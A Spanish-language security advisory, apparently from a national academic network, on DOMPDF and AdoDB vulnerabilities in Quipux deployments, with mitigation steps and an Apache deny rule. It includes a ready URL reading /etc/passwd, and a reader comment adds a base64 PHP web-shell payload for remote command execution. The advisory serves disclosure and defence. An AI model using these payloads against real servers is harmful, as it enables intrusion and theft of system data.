Falla en versiones de Quipux utilizadas por instituciones en el país.

Gracias a reporte del CSIRT EPN conocemos que implementaciones del sistema de gestión documental Quipux que se basan en los repositorios de minka son vulnerables a lectura arbitraria de archivos y RCE debido al componente DOMPDF versión 0.6.0 o inferior.

URL de minka con el componente vulnerable:
https://minka.gob.ec/subgobelectro/Quipux/blob/master/Quipux/quipux_comunidad_v4/quipux/js/dompdf/dompdf.php

En las siguientes URL se explica cómo explotar la vulnerabilidad. Por la fecha del CVE, ha estado presente desde el 2014:
https://www.exploit-db.com/exploits/33004
https://regilero.github.io/security/english/2016/12/19/security_dompdf_rce/

Para probar la vulnerabilidad en un sitio se puede usar el siguiente exploit:
http(s)://SUSITIOQUIPUX/js/dompdf/dompdf.php?input_file=/etc/passwd

Sustituya SUSITIOQUIPUX por el nombre de su sitio quipux, ej: «quipux.institucion.edu.ec» (sin comillas)

En base a conversación sostenida con CSIRT EPN sugerimos:
1- Ubicar el servicio de Quipux detrás de un WAF. Puede contactar a NOC de CEDIA para coordinar el proceso para poner el sitio de Quipux detrás del WAF
2- Actualizar dompdf a la versión 0.6.1
3- Comunicarse con la entidad responsable para conocer sobre el proceso de obtener una versión actualizada de Quipux. https://www.gobiernoelectronico.gob.ec/proceso-de-implantacion-quipux/

Sugerimos una revisión completa del sistema Quipux en vista de que pueden existir otros componentes que requieran actualización.

Cualquier duda, estamos gustosos de apoyarles

Agradecemos el informe de Edison Jiménez del CSIRT EPN https://www.csirt-epn.edu.ec/

Actualización al 2021-01-05

Hemos recibido de una de nuestras Universidades miembro un aviso de incidente y que notificamos ayer enseguida a los contactos
técnicos registrados en nuestro sistema Yari.

Se trata de un incidente en el que se reporta que se aprovecharon vulnerabilidades conocidas en el componente AdoDB que usa Quipux.

Hemos notificado al personal involucradas en el proyecto Quipux, esperando que puedan aplicar una medida correctiva. Sin embargo, por lo expuesto en este artículo, los problemas de seguridad que tiene Quipux pueden tomar un tiempo en solventarse.

Mientras tanto, se sugiere, además de lo ya expuesto:

  1. Que nos reporten si tienen una instancia particular de Quipux y que esté detrás de nuestro WAF y de ser así, nos indiquen la
    URL exacta del mismo, por ejemplo:
  • https://quipux.universidad.edu.ec/
  • https://docs.universidad.edu.ec/quipux
  • etc.
  1. De no ser así, pueden:

a. Si usan la instancia central de Quipux, solicitar el apoyo a la entidad respectiva encargada del servicio.

b. Si usan una instancia particular que no esté destrás de nuestro WAF, aplicar una regla que impida el acceso al directorio /adodb (y otros más) de la aplicación. Esto se puede hacer en el firewall (si lo permite) y/o en el servidor web con un archivo como /etc/httpd/conf.d/nodir.conf (ejemplo para Apache) con el siguiente contenido:

<DirectoryMatch "bodega|adodb|backup">
    <FilesMatch "(?i)\.(php|php3?|phtml|js)$">
        Order Deny,Allow
        Deny from All
    </FilesMatch>
</DirectoryMatch>

c. Si usan una instancia particular de Quipux, también se sugiere de ser posible, mantener el acceso únicamente desde la red interna y/o vía VPN para acceso desde fuera de la LAN.

Actualización al 2020-07-31

De mintel nos informan que se ha realizado una actualización al Quipux en base a este reporte. La actualización está disponible en:

https://minka.gob.ec/quipux-comunitario/quipux-comunitario

Se elimina la carpeta dompdf

Realizar las siguientes acciones. los archivos modificados pueden bajarse de la rama mencionada.

reemplazar:   plantillas/CodigoBarras.php
borrar:    plantillas/GenerarDocumento.php
reemplazar:   plantillas/Sobres.php
reemplazar:   uploadFiles/cargar_doc_digitalizado_paginador.php

Agradecemos comunicación de la Dirección nacional de provisión de servicios electrónicos del Mintel

Un comentario en «Falla en versiones de Quipux utilizadas por instituciones en el país.»

  • el 2020/08/07 a las 10:20 AM
    Enlace permanente

    No solo eso, el parametro input_file nos permite ingresar codigos en base64. Por ejemplo algo como «». El siguiente exploit nos permite ejecutar comandos al servidor y a su ves tambien podriamos ejecutar un reverse shell con la possibilidad de conseguir root.

    http(s)://SUSITIOQUIPUX/js/dompdf/dompdf.php?cmd=COMANDO&input_file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

    Respuesta

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.